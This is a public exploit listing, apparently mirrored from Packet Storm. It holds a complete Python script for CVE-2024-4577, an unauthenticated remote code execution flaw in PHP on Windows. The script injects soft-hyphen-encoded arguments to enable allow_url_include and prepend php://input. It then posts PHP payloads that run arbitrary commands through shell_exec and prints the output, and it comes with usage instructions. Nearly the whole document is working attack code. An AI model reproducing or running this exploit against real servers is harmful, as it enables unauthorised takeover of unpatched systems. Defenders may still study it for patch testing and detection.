Share
## https://sploitus.com/exploit?id=PACKETSTORM:179085
# Exploit Title: PHP Windows Remote Code Execution (Unauthenticated)  
# Exploit Author: Yesith Alvarez  
# Vendor Homepage: https://www.php.net/downloads.php  
# Version: PHP 8.3,* < 8.3.8, 8.2.*<8.2.20, 8.1.*, 8.1.29  
# CVE : CVE-2024-4577  
  
from requests import Request, Session  
import sys  
import json  
  
  
  
def title():  
print('''  
  
_______ ________ ___ ___ ___ _ _ _ _ _____ ______ ______   
/ ____\ \ / / ____| |__ \ / _ \__ \| || | | || | | ____|____ |____ |  
| | \ \ / /| |__ ______ ) | | | | ) | || |_ ______| || |_| |__ / / / /   
| | \ \/ / | __|______/ /| | | |/ /|__ _|______|__ _|___ \ / / / /   
| |____ \ / | |____ / /_| |_| / /_ | | | | ___) | / / / /   
\_____| \/ |______| |____|\___/____| |_| |_| |____/ /_/ /_/   
  
  
Author: Yesith Alvarez  
Github: https://github.com/yealvarez  
Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/  
Code improvements: https://github.com/yealvarez/CVE/blob/main/CVE-2024-4577/exploit.py  
''')   
  
  
def exploit(url, command):   
payloads = {  
'<?php echo "vulnerable"; ?>',  
'<?php echo shell_exec("'+command+'"); ?>'   
}   
headers = {  
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0',  
'Content-Type': 'application/x-www-form-urlencoded'}  
s = Session()  
for payload in payloads:  
url = url + "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"  
req = Request('POST', url, data=payload, headers=headers)  
prepped = req.prepare()  
del prepped.headers['Content-Type']  
resp = s.send(prepped,  
verify=False,  
timeout=15)  
#print(prepped.headers)  
#print(url)  
#print(resp.headers)   
#print(payload)  
print(resp.status_code)  
print(resp.text)  
  
  
if __name__ == '__main__':  
title()  
if(len(sys.argv) < 2):  
print('[+] USAGE: python3 %s https://<target_url> <command>\n'%(sys.argv[0]))  
print('[+] USAGE: python3 %s https://192.168.0.10\n dir'%(sys.argv[0]))   
exit(0)  
else:  
exploit(sys.argv[1],sys.argv[2])